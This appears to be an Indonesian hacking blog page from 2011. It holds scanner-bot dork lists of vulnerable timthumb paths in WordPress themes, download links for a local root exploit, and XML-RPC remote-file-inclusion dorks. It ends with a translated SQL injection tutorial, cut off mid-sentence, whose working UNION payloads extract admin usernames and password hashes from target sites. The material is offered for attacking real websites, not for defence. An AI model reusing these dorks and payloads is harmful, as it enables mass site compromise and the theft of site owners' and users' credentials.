Kamis, 22 Desember 2011

bug dork timthumb ( Wordpress ) Scanner

!tim /wp-content/themes/classifiedstheme/thumbs/ "/wp-content/themes/classifiedstheme/thumbs/"
!tim /wp-content/themes/sportpress/scripts/timthumb.php "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/eNews/timthumb.php /wp-content/themes/eNews/
!tim /wp-content/themes/Nova/timthumb.php /wp-content/themes/Nova/
!tim /wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/ "/plugins/igit-related-posts-with-thumb-images-after-posts/"
!tim /wp-content/themes/sportpress/scripts/ "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/announcement/functions/thumb.php /themes/announcement/functions/
!tim wp-content/themes/sportpress/scripts/thumb.php "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/LightBright/ "wp-content/themes/LightBright/"
!tim /wp-content/themes/Glider "wp-content/themes/Glider"
!tim wp-content/themes/Mystique/cache/ wp-content/themes/Mystique/cache/
!tim wp-content/plugins/uBillboard/ wp-content/plugins/uBillboard/
!tim wp-content/themes/wpuniversity/scripts/timthumb.php "wp-content/themes/wpuniversity/scripts"
!tim /wp-content/themes/mypolylens/sp-framework /wp-content/themes/mypolylens/sp-framework
!tim /wp-content/themes/sakura/plugins/woo-tumblog/ /wp-content/themes/sakura/plugins/woo-tumblog/
!tim /wp-content/themes/directorypress/ /wp-content/themes/directorypress/
!tim /wp-content/plugins/autofashion/ /wp-content/plugins/autofashion
!tim /wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php "/wp-content/themes/WPFanPro2.0/lib"
!tim /wp-content/themes/versatile /wp-content/themes/versatile
!tim /wp-content/themes/classifiedstheme/thumbs/ "/wp-content/themes/classifiedstheme/thumbs/"
!tim /wp-content/plugins/akismet/ "/wp-content/plugins/akismet/"
!tim /wp-content/gd-star-rating/ "/wp-content/gd-star-rating/"
!tim /wp-content/themes/Memoir/ "/wp-content/themes/Memoir/"
!tim /blog/wp-content/themes/clockstone/images/
!tim /wp-content/themes/mio/sp-framework/timthumb/timthumb.php "/themes/mio/"
!tim /wp-content/themes/coda/ "/themes/coda/"
!tim /wp-content/themes/OptimizePress/ "/wp-content/themes/OptimizePress/"
/wp-content/themes/TheStyle/
/wp-content/themes/nool/
/wp-content/themes/PersonalPress/
/wp-content/themes/SimplePress/
/wp-content/themes/DeepFocus/
/wp-content/themes/DelicateNews/
/wp-content/themes/Bold/
/wp-content/themes/eStore/
/wp-content/themes/TheProfessional/
/wp-content/themes/OnTheGo/
/wp-content/themes/AskIt/
/wp-content/themes/Nova/
/wp-content/themes/eNews/
/wp-content/themes/eVid/
/wp-content/themes/TheCorporation/
/wp-content/themes/Minimal/
/wp-content/themes/Polished/
/wp-content/themes/MyResume/
/wp-content/themes/TheSource/
/wp-content/themes/StudioBlue/
/wp-content/themes/Wooden/
/wp-content/themes/WhosWho/
/wp-content/themes/Quadro/
/wp-content/themes/Glow/
/wp-content/themes/Modest/
/wp-content/themes/Aggregate/
/wp-content/themes/ArtSee/
/wp-content/themes/versatile/
/wp-content/themes/omni-shop/
/wp-content/themes/manifesto/scripts/
/wp-content/themes/arthem-mod/scripts/
/wp-content/themes/echoes/
/wp-content/themes/Bold4/
/wp-content/themes/primely-theme/scripts/
/wp-content/themes/zenkoreviewRD/scripts/
/wp-content/themes/ElegantEstate/
/wp-content/themes/PersonalPress2/
/wp-content/themes/mypage/scripts/
/wp-content/themes/magazinum/scripts/
/wp-content/themes/pbv_multi/scripts/
/wp-content/themes/photofeature/scripts/
/wp-content/themes/ColdStone/
/wp-content/themes/HMDeepFocus/
/wp-content/themes/EarthlyTouch/
/wp-content/themes/Boutique/
/wp-content/themes/ePhoto/
/wp-content/themes/PureType/
/wp-content/themes/13Floor/
/wp-content/themes/BusinessCard/
/wp-content/themes/CherryTruffle/
/wp-content/themes/Cion/
/wp-content/themes/DailyNotes/
/wp-content/themes/eGallery/
/wp-content/themes/eGamer/
/wp-content/themes/GrungeMag/
/wp-content/themes/Influx/
/wp-content/themes/LightBright/
/wp-content/themes/LightSource/
/wp-content/themes/Magnificent/
/wp-content/themes/Memoir/
/wp-content/themes/AskIt_v1.6/AskIt/
/wp-content/themes/TidalForce/
/wp-content/themes/Atlantis/
/wp-content/themes/DelicateNewsYellow/
/wp-content/themes/themorningafter/
/wp-content/themes/arthemia-premium/scripts/
/wp-content/themes/arthemia/scripts/
/wp-content/themes/arthemia-premium-park/scripts/
/wp-content/themes/linepress/
/wp-content/themes/wedding/
/wp-content/themes/graduate/
/wp-content/themes/wp-newspaper/
/wp-content/themes/advanced-newspaper/
/wp-content/themes/journey/
/wp-content/themes/newspro/
/wp-content/themes/transcript/
/wp-content/themes/showfolio/
/wp-content/themes/quickstart/
/wp-content/themes/Restorante/
/wp-content/themes/snapwire/
/wp-content/themes/aqua-blue/includes/
/wp-content/themes/swatch/functions/
/wp-content/themes/announcement/functions/
/wp-content/themes/empire/functions/
/wp-content/themes/supportpress/functions/
/wp-content/themes/editorial/functions/
/wp-content/themes/statua/functions/
/wp-content/themes/briefed/functions/
/wp-content/themes/faultpress/functions/
/wp-content/themes/kaboodle/functions/
/wp-content/themes/savinggrace/functions/
/wp-content/themes/premiere/functions/
/wp-content/themes/simplicity/functions/
/wp-content/themes/deliciousmagazine/functions/
/wp-content/themes/canvas-buddypress/functions/
/wp-content/themes/bookclub/functions/
/wp-content/themes/boldnews/functions/
/wp-content/themes/placeholder/functions/
/wp-content/themes/biznizz/functions/
/wp-content/themes/auld/functions/
/wp-content/themes/listings/functions/
/wp-content/themes/elefolio/functions/
/wp-content/themes/chapters/functions/
/wp-content/themes/continuum/functions/
/wp-content/themes/diner/functions/
/wp-content/themes/skeptical/functions/
/wp-content/themes/caffeinated/functions/
/wp-content/themes/crisp/functions/
/wp-content/themes/sealight/functions/
/wp-content/themes/unite/functions/
/wp-content/themes/estate/functions/
/wp-content/themes/tma/functions/
/wp-content/themes/coda/functions/
/wp-content/themes/inspire/functions/
/wp-content/themes/apz/functions/
/wp-content/themes/spectrum/functions/
/wp-content/themes/diarise/functions/
/wp-content/themes/boast/functions/
/wp-content/themes/retreat/functions/
/wp-content/themes/cityguide/functions/
/wp-content/themes/cinch/functions/
/wp-content/themes/slanted/functions/
/wp-content/themes/canvas/functions/
/wp-content/themes/postcard/functions/
/wp-content/themes/delegate/functions/
/wp-content/themes/mystream/functions/
/wp-content/themes/optimize/functions/
/wp-content/themes/backstage/functions/
/wp-content/themes/sophisticatedfolio/functions/
/wp-content/themes/bueno/functions/
/wp-content/themes/digitalfarm/functions/
/wp-content/themes/headlines/functions/
/wp-content/themes/f0101/functions/
/wp-content/themes/royalle/functions/
/wp-content/themes/exposure/functions/
/wp-content/themes/rockstar/functions/
/wp-content/themes/dailyedition/functions/
/wp-content/themes/object/functions/
/wp-content/themes/antisocial/functions/
/wp-content/themes/coffeebreak/functions/
/wp-content/themes/mortar/functions/
/wp-content/themes/bigeasy/functions/
/wp-content/themes/groovyphoto/functions/
/wp-content/themes/groovyblog/functions/
/wp-content/themes/mainstream/functions/
/wp-content/themes/featurepitch/functions/
/wp-content/themes/suitandtie/functions/
/wp-content/themes/thejournal/functions/
/wp-content/themes/myweblog/functions/
/wp-content/themes/aperture/functions/
/wp-content/themes/metamorphosis/functions/
/wp-content/themes/bloggingstream/functions/
/wp-content/themes/thestation/functions/
/wp-content/themes/groovyvideo/functions/
/wp-content/themes/productum/functions/
/wp-content/themes/newsport/functions/
/wp-content/themes/irresistible/functions/
/wp-content/themes/cushy/functions/
/wp-content/themes/wootube/functions/
/wp-content/themes/forewordthinking/functions/
/wp-content/themes/geometric/functions/
/wp-content/themes/abstract/functions/
/wp-content/themes/busybee/functions/
/wp-content/themes/blogtheme/functions/
/wp-content/themes/gothamnews/functions/
/wp-content/themes/thick/functions/
/wp-content/themes/typebased/functions/
/wp-content/themes/overeasy/functions/
/wp-content/themes/ambience/functions/
/wp-content/themes/snapshot/functions/
/wp-content/themes/openair/functions/
/wp-content/themes/freshfolio/functions/
/wp-content/themes/papercut/functions/
/wp-content/themes/proudfolio/functions/
/wp-content/themes/vibrantcms/functions/
/wp-content/themes/freshnews/functions/
/wp-content/themes/livewire/functions/
/wp-content/themes/gazette/functions/
/wp-content/themes/flashnews/functions/
/wp-content/themes/premiumnews/functions/
/wp-content/themes/newspress/functions/
/wp-content/themes/8q/scripts/
/wp-content/themes/aerial/lib/
/wp-content/themes/aesthete/
/wp-content/themes/albizia/includes/
/wp-content/themes/amphion-lite/script/
/wp-content/themes/aranovo/scripts/
/wp-content/themes/arras/library/
/wp-content/themes/arras-theme/library/
/wp-content/themes/arthemix-bronze/scripts/
/wp-content/themes/artisan/includes/
/wp-content/themes/arthemix-green/scripts/
/wp-content/themes/a-simple-business-theme/scripts/
/wp-content/themes/a-supercms/
/wp-content/themes/aureola/scripts/
/wp-content/themes/aurorae/
/wp-content/themes/autofashion/
/wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/
/wp-content/themes/bikes/
/wp-content/themes/automotive-blog-theme/
/wp-content/themes/black_eve/
/wp-content/themes/blex/scripts/
/wp-content/themes/bloggnorge-a1/scripts/
/wp-content/themes/blogified/
/wp-content/themes/blue-corporate-hyve-theme/
/wp-content/themes/bluemag/library/
/wp-content/themes/blue-news/scripts/
/wp-content/themes/bombax/includes/
/wp-content/themes/breakingnewz/
/wp-content/themes/brightsky/scripts/
/wp-content/themes/brochure-melbourne/includes/
/wp-content/themes/business-turnkey/assets/js/
/wp-content/themes/calotropis/includes/
/wp-content/themes/coffee-lite/
/wp-content/themes/comet/scripts/
/wp-content/themes/conceditor-wp-strict/scripts/
/wp-content/themes/constructor/layouts/
/wp-content/themes/constructor/libs/
/wp-content/themes/constructor/
/wp-content/themes/coverht-wp/scripts/
/wp-content/themes/cover-wp/scripts/
/wp-content/themes/dark-dream-media/
/wp-content/themes/deep-blue/
/wp-content/themes/delicate/
/wp-content/themes/diamond-ray/
/wp-content/themes/dieselclothings/
/wp-content/themes/digitalblue/
/wp-content/themes/dimenzion/
/wp-content/themes/epione/script/
/wp-content/themes/evr-green/scripts/
/wp-content/themes/famous/megaframe/megapanel/
/wp-content/themes/famous/
/wp-content/themes/fashion-style/
/wp-content/themes/featuring/
/wp-content/themes/fliphoto/
/wp-content/themes/flix/
/wp-content/themes/fordreporter/scripts/
/wp-content/themes/freeside/
/wp-content/themes/fresh-blu/scripts/
/wp-content/themes/go-green/modules/
/wp-content/themes/granite-lite/scripts/
/wp-content/themes/greydove/
/wp-content/themes/greyzed/functions/efrog/lib/
/wp-content/themes/gunungkidul/
/wp-content/themes/heartspotting-beta/
/wp-content/themes/heli-1-wordpress-theme/images/
/wp-content/themes/ideatheme/
/wp-content/themes/impressio/timthumb/
/wp-content/themes/introvert/
/wp-content/themes/inuit-types/
/wp-content/themes/isotherm-news/
/wp-content/themes/iwana-v10/
/wp-content/themes/jambo/
/wp-content/themes/jcblackone/
/wp-content/themes/kratalistic/
/wp-content/themes/life-style-free/
/wp-content/themes/likehacker/
/wp-content/themes/litepress/scripts/
/wp-content/themes/loganpress-premium-theme-1/
/wp-content/themes/magazine-basic/
/wp-content/themes/magup/
/wp-content/themes/make-money-online-theme-1/scripts/
/wp-content/themes/make-money-online-theme-2/scripts/
/wp-content/themes/make-money-online-theme-3/scripts/
/wp-content/themes/make-money-online-theme-4/scripts/
/wp-content/themes/make-money-online-theme/scripts/
/wp-content/themes/meintest/layouts/
/wp-content/themes/mobilephonecomparision/
/wp-content/themes/moi-magazine/
/wp-content/themes/my-heli/images/
/wp-content/themes/mymag/
/wp-content/themes/mystique/extensions/auto-thumb/
/wp-content/themes/nash/theme-assets/php/
/wp-content/themes/neofresh/
/wp-content/themes/neo_wdl/includes/extensions/
/wp-content/themes/new-green-natural-living-ngnl/scripts/
/wp-content/themes/newspress/
/wp-content/themes/pearlie/scripts/
/wp-content/themes/pico/scripts/
/wp-content/themes/postage-sydney/includes/
/wp-content/themes/premium-violet/
/wp-content/themes/probluezine/
/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
/wp-content/themes/pronto/cjl/pronto/uploadify/uploadify.php
/wp-content/themes/r755/
/wp-content/themes/regal/
/wp-content/themes/shaan/
/wp-content/themes/shadow-block/
/wp-content/themes/shadow/
/wp-content/themes/simple-but-great/
/wp-content/themes/simplenews_premium/scripts/
/wp-content/themes/simple-red-theme/
/wp-content/themes/simple-tabloid/
/wp-content/themes/simplewhite/
/wp-content/themes/slidette/timThumb/
/wp-content/themes/snowblind_colbert/
/wp-content/themes/snowblind/
/wp-content/themes/spotlight/
/wp-content/themes/squeezepage/
/wp-content/themes/standout/
/wp-content/themes/suffusion/
/wp-content/themes/swift/includes/
/wp-content/themes/swift/includes/
/wp-content/themes/swift/
/wp-content/themes/techozoic-fluid/options/
/wp-content/themes/the_dark_os/tools/
/wp-content/themes/themetiger-fashion/
/wp-content/themes/theory/
/wp-content/themes/the-theme/core/libs/thumbnails/
/wp-content/themes/thrillingtheme/
/wp-content/themes/tm-theme/js/
/wp-content/themes/totallyred/scripts/
/wp-content/themes/travelogue-theme/scripts/
/wp-content/themes/true-blue-theme/
/wp-content/themes/ttnews-theme/
/wp-content/themes/typographywp/
/wp-content/themes/ugly/
/wp-content/themes/unity/
/wp-content/themes/versitility/
/wp-content/themes/vibefolio-teaser-10/scripts/
/wp-content/themes/vina/
/wp-content/themes/whitemag/script/
/wp-content/themes/wpapi/
/wp-content/themes/wpbus-d4/includes/
/wp-content/themes/wp-creativix/scripts/
/wp-content/themes/wp-newsmagazine/scripts/
/wp-content/themes/wp-perfect/js/
/wp-content/themes/wp-premium-orange/
/wp-content/themes/xiando-one/
/wp-content/themes/zcool-like/
/wp-content/themes/zcool-like/uploadify.php
/wp-content/themes/twittplus/scripts/

Sabtu, 19 Maret 2011

local root versi bogel ( video mode on )

hehehee.. ketemu lagi :P :P :P :P
langsung aja om seperti judul ..

download ->> http://www.mediafire.com/?6tu953t7ev2t70z

-= bogel @reload-x.us =- http://bogel.biz or http://reload-x.us/

Video Bikin Server IRC + Services Nya

yuhuuu... !! .. nih aq ad sedikit tutorial ( video buat server irc + services nya )
soalnya aq liat di paman google smua pada copas hihihii.. piss bos !!

langsung download aja om ->> http://www.mediafire.com/?ppxcuqqn2eji6er

-= bogel @reload-x.us =- http://bogel.biz/ or http://reload-x.us/

Senin, 28 Februari 2011

dOrK XML

!xml active/components/xmlrpc/client.php?c[components]= /Pindorama/
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]= "class.pages.php"
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus"
!xml /nucleus/xmlrpc/server.php "index.php?blogid="
!xml /nucleus/xmlrpc/server.php "The Nucleus Group"
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"
!xml /xmlrpc.php /amfx
!xml /amfx/xmlrpc.php "BlazeDS"
!xml /amfx/xmlrpc.php "anything"
!xml /xmlrpc.php dev-php/PEAR-XML_RPC
!xml xmlrpc.php "PEAR-XML_RPC"
!xml xmlrpc.php "phpxmlrpc"
!xml xmlrpc.php "/PEAR-XML_RPC"
!xml xmlrpc.php "/pear"
!xml xmlrpc.php "/SRPMS"
!xml xmlrpc.php "/php-pear"
!xml xmlrpc.php "phpMyFAQ"
!xml xmlrpc.php "PHPXMLRPC"
!xml xmlrpc.php "Trustix"
!xml xmlrpc.php "Strayhorn"
!xml /xmlrpc.php /modules.php?op=modload
!xml /xmlrpc.php Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom!
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes* WordPress ME *
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes+wordpress
!xml /xmlsrv/xmlrpc.php "Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlsrv/xmlrpc.php "Original template design by Free CSS Templates"
!xml /xmlrpc.php "XML-RPC library"
!xml /pingserver.php /pMachine+pnSession+pmserver+pm
!xml /pingserver.php /pMachine+pm
!xml /pingserver.php /pMachine+index.php
!xml /pingserver.php /pMachine,pMachine
!xml /xmlrpc.php /include+phpMyFAQ
!xml /xmlrpc.php TikiWiki+utils.php
!xml /xmlrpc.php powered+by+postnuke
!xml /xmlrpc.php "BLOG:CMS"
!xml /xmlrpc.php "faultString XML error: no element found at line 1"
!xml /xmlrpc.php "PEAR XML_RPC"
!xml /xmlrpc.php "Xoops"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlrpc.php "postnuke"
!xml /xmlrpc.php "dailyblog"
!xml /xmlrpc.php phpgroupware
!xml /xmlphp.php "XML-RPC for PHP"
!xml /nucleus/xmlrpc.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /drupal/xmlrpc.php callback
!xml /nucleus/xmlrpc/server.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /xmlrpc.php "Squirrelcart"
!xml /xmlrpc.php "Powered By Wordpress"
!xml /xmlrpc.php RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP
!xml /xmlrpc.php "com_pollxt"
!xml /adxmlrpc.php /phpAdsNew/ site:.it
!xml /xmlrpc.php "action"+"poll_ident"
!xml /xmlrpc.php "webcalendar"
!xml /WordPress WordPress 1.2.1
!xml /b2/xmlsrv/xmlrpc.php /b2+site:.it
!xml /b2evo/xmlsrv/xmlrpc.php /b2evo+site:.it
!xml /blog/xmlrpc.php /blog+site:.it
!xml /blog/xmlsrv/xmlrpc.php /blog+site:.it
!xml /blogs/xmlrpc.php /blogs+site:.it
!xml /blogs/xmlsrv/xmlrpc.php /blogs+site:.it
!xml /blogtest/xmlsrv/xmlrpc.php /blogtest+site:.it
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml serendipity_xmlrpc.php "Powered by. Serendipity PHP Weblog"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /blogs/b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus" site:it
!xml /nucleus/xmlrpc/server.php "index.php?blogid=" site:.it
!xml /nucleus/xmlrpc/server.php "The Nucleus Group" site:.it
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml /faq/xmlrpc.php "/index.php?p=faq"
!xml /faq/xmlrpc.php "/index.php?pg=faq"
!xml /faq/xmlrpc.php "/index.php?pag=faq"
!xml /faq/xmlrpc.php "/index.php?page=faq"
!xml /faq/xmlrpc.php "/?faq"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"

Simple SQL Hacking by Marezzi

Simple SQL Hacking

ada beberapa kata dari terjemahan ini yang agak berbeda untuk memudahkan newbie seperti saya ini untuk memahami.

di ambil dari

http://milw0rm.com/papers/202

================= begin of paper ====================


SQL Injection Tutorial by Marezzi (MySQL)

Dalam tutorial ini saya akan menggambarkan bagaimana sql injection bekerja dan bagaimana teknik ini bisa memberikan seseorang informasi yang sangat berguna.

Pertama : apa itu SQL Injection??

Bug ini merupakan Bug yang paling umum yang ada pada applikasi web sampai sekarang. Celah keamanan ini mengizinkan attacker untuk mengeksekusi database melalui Url dan mendapatkan access untuk memperoleh informasi penting dan lain-lain.

1. SQL Injection (memanfaatkan error yang terlihat)
2. Blind SQL Injection (Agak Sulit)

1. SQL Injection (memanfaatkan error yang terlihat/classic SQL Injection)

-= Pengecekan apakah site bisa di Attack apa tidak dengan teknik sql injection.

misal kita memiliki target seperti ini:
Code:
http://www.site.com/news.php?id=5

kita coba site berlubang atau tidak dengan menambah tanda ' (petik satu) di akhir url dan hasilnya akan menjadi seperti
Code:
http://www.site.com/news.php?id=5'

jika kita melihat error seperti "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right bla..bla.." atau error yang sejenis, itu berarti site bisa kita Attack menggunakan SQL injection.

-= tahap kedua menebak jumlah kolom

untuk menemukan banyak kolom kita menggunakan command ORDER BY. Bagaimana menggunakan perintah ini? kita hanya menambah angkat setelah By sampai kita mendapatkan error. misal
Code:
http://www.site.com/news.php?id=5 order by 1/* <-- ga ada error http://www.site.com/news.php?id=5 order by 2/* <-- ga ada error http://www.site.com/news.php?id=5 order by 3/* <-- ga ada error http://www.site.com/news.php?id=5 order by 4/* <-- ternyata error klo misal nampak errornya maka akan ada tulisan "Unknwon column '4' in 'order clause' " atau yang mirip seperti itu. itu berarti database memiliki 3 kolom karena sewaktu kita mencoba menebak kolom ke 4 ternyata hasilnya error itu tandanya kolom ke 4 tidak ada. -= Mencari data selanjutnya dengan menggunakan UNION (perintah mengabungkan) Dengan UNION kita menggabungkan perintah yang lainnya dalam satu perintah (seringnya perintah SELECT. Misal Code: http://www.site.com/news.php?id=5 union select 1,2,3/* (kenapa ada 1,2,3 itu karena kita sebelumnya sudah mendapatkan ada 3 kolom hasil dari perintah ORDER BY kalau misal ada 4 kolom ya jadi 1,2,3,4) jika kita melihat salah satu angka dari tiga angka tadi maka itu tandannya perintah UNION bekerja. -= Lanjut tahap selanjutnya pengecekan versi mysql misal: Code: http://www.site.com/news.php?id=5 union all select 1,2,3/* nb: jika ini tidak bekerja coba ganti '/*' menggunakan '--' (cari di google arti tanda-tanda itu). Misal di layar muncul angka 2, maka kita ganti angka dua itu dengan perintah @@version atau version() jika tidak error maka akan muncul versi dari mysql seperti 4.1.33-log or 5.0.45 atau semacam nya. kalau mendapatkan error seperti "union + illegal mix of collations (IMPLICIT + COERCIBLE) ... bla bla bla" berarti kita membutuhkan fungsi convert() misal Code: http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* atau bisa juga dengan menggunakan hex() dan unhex() misal Code: http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* maka akan tampil versi dari mysql nya.. ^^ -= tahap selanjutnya dapatkan nama table sama nama kolomnya Jika kita mendapatkan versi mysql dibawah versi 5 (4.1.33, 4.1.12..). berarti kita harus menebak sendiri nama tabel sama kolomnya. umumnya nama table seperti ini:user,users,admin,admins,member,members dll... lalu untuk nama kolom umumnya seperti ini:username,user,usr,user_name,password,pass,passwd,pwd,dll.. misal kita tebak seperti ini untuk nama tablenya. Code: http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (kita lihat angka 2 muncul di layar seperti sebelumnya) berarti tabel dengan nama admin memang ada. sekarang kita tinggal tebak nama kolomnya. misal Code: http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* jika mendapat error atau layar kosong maka coba tebak dengan nama lain. jika berhasil maka di layar akan tampak username,contohnya admin atau superadmin atau lain"... sekarang coba tebak kolom passwordnya misalkan Code: http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* kalau error coba nama lain. kalau berhasil maka akan ada password yang tampil di layar baik itu dalam bentuk hash(terenkripsi) atau plain-text(tidak di enkripsi) tergantung dari settingan mysqlnya. contohnya: md5 hash, mysql hash, sha1, dll.. sekarang kita harus merubah query biar terlihat lebih enak di pandang. untuk itu kita membutuhkan fungsi concat() untuk menggabungkan kedua string (username dan password) contoh : Code: http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/* lihat di contoh itu ada 0x3a, 0x3a dalam hexadesimal memiliki arti tanda titik dua ':'. ada juga dengan cara char(58) *angka 58 dalam ASCII* misal Code: http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/* maka kita akan mendapatkan hasil di layar seperti ini username : password contoh nya 'admin:admin' atau 'admin:somehash'. kita bisa login menggunakan username dan password tersebut untuk mendapatkan akses dalam aplikasi web tersebut. jika tidak dapat menebak nama tabel name dengan benar, kamu coba gunakan mysql.user(default) contoh Code: http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/* -= MySQL 5 jika kita mendapatkan versi 5 maka kita membutuhkan information_schema untuk mendapatkan nama tabel dan nama kolom. informtion_schema ini menyimpan semua informasi table dan kolomnya. untuk mendapatkan tabelnya kita gunakan table_name dan information_schema.tables. contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/* disini kita coba mengganti angka 2 dengan table_name untuk mendapatkan tabel pertama dari information_schema.tables yang akan di tampilkan dilayar. sekarang kita butuh menambah LIMIT di akhir query untuk menampilkan satu persatu semua database.contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/* disini saya menggunakan 0,1 (dapatkan 1 output dimulai dari yang paling awal '0th'). untuk melihat tabel kedua kita ganti limit 0,1 jadi limit 1,1 contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/* maka akan muncul di layar table kedua dari database. tuk yang ketiga kita ganti lagi menjadi limit 2,1 contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/* trus di tambah satu-satu sampe dapatkan tabel yang di mau.contohnya db_admin,poll_user, auth, auth_user dll.. untuk mendapatkan nama kolom menggunakan metode yang sama. tapi bedanya untuk kolom kita menggunakan colomn_name dan information_schema.colomns. Metode yang digunakan sama seperti diatas contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/* kolom pertama akan tampil. dan untuk yang kedua (kita ganti limit 0,1 menjadi limit 1,1) contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/* maka akan tampil kolom yang kedua, lakukan terus penambahan pada limit tadi hingga kita dapatkan kolom yang kita mau seperti username,user,login,password,pass,passwd,dll.. :D jika kamu ingin menampilkan nama kolom pada tabel tertentu bisa gunakan query ini. misal kita sudah menemukan table dengan nama 'users' (tanpa tanda petik) contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/* maka kita akan mendapatkan nama kolom pertama pada table users. Gunakan LIMIT untuk menampilkan satu persatu semua nama kolom dalam tabel user. (query tidak bisa dikarenakan jika magic quotes dalam keadaan ON). misal kita sudah menemukan kolom user,pass,dan email. untuk 